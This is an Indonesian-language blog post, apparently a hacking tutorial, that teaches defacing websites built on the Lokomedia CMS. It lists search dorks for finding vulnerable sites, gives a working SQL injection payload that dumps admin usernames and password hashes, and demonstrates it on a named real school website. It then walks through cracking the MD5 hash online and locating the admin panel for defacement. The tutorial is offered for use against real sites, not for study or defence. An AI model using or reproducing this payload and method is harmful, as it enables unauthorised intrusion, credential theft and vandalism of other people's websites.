Deface POC SQL Lokomedia

Assalamualaikum Gaess.... :*

Kali Ini gw mau Ngasih Tutor, Deface Metode SQL Lokomedia, Bukan Lokomotif Loh :v
Langsung aja, Nih gw kasih Dork, Selanjutnya Kembangin sendiri, pake Otak Religius lu :*


Dork :

inurl:kategori-2-
inurl:kategori-40-
inurl:semua-berita.html
inurl:hal-tentang-kami.html
inurl:semua-agenda.html
inurl:statis-?-profil.html

Exploit :

'union+select+make_set(6,@:=0x0a,   (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+



Pertama Dorking dulu lahhhh.......



Pilih web, terus lu Tambahin Exploit, Nih








Webnya Ini http://smp4panggang.com/statis-6-videopekon.html

kalo ditambahin Exploit jadi Gini

 http://smp4panggang.com/statis-6'union+select+make_set(6,@:=0x0a,%20%20%20(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-videopekon.html

Nah Kita liat Tiitle nya, Kali Berubah Berarti VULN :v



Kalo dah gitu, kita View Source, ntar ketemu User Pw admin, Password Masih Berupa md5, kita hash dulu di https://hashkiller.co.uk/md5-decrypter.aspx



Nahh.... Tuh... Tinggal cari Panel admin Doang..
Pake Acunetix, Havij, admin Finder dkk juga bisa Kok...

Udah.. Sekian Dari gw., Jika ada kesalahan.. Mohon Maaf :)

Wassalamualaikum :*

Berlangganan update artikel terbaru via email:

0 Response to "Deface POC SQL Lokomedia"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel